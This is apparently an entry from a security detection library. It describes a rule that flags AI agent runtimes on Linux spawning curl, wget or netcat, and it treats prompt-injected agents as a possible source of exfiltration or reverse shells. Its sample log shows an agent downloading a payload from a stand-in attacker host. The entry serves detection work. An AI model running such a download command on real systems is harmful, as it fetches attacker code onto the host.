Detection Library
highexperimentalLinuxOCIT1105
Linux Agent Spawning Curl Wget Or Netcat
Detects AI agent runtimes spawning network utility tools such as curl, wget, or netcat, indicating potential data exfiltration, payload download, or reverse shell establishment driven by tool misuse or prompt injection.
Updated Jan 10, 2025 · OCI AI Security Team
agentic-aitool-misusecurlwgetnetcatlinuxociowasp-asi02
Problem Statement
curl, wget, and netcat are powerful network tools that can download payloads, exfiltrate data, or establish reverse shells. When spawned by an AI agent runtime they represent a misuse of the agent's tool invocation capability and indicate the agent is being weaponized.
Sample Logs
{"timestamp":"2025-01-10T15:42:08Z","computer_name":"oci-worker-05","user":"agent_svc","image":"/usr/bin/curl","command_line":"curl -o /tmp/payload.sh https://evil.example.com/payload.sh","parent_image":"/usr/bin/python3"}Required Fields
image
command_line
parent_image
user
computer_name
False Positives
- ·Agents using curl or wget as part of legitimate API interactions defined in their tool specification
- ·Health check scripts that spawn curl to verify service availability
Tuning Guidance
Build an allowlist of approved destinations that agents may curl. Alert on any command-line containing -o (output to file), pipe operators, or connections to non-approved hosts.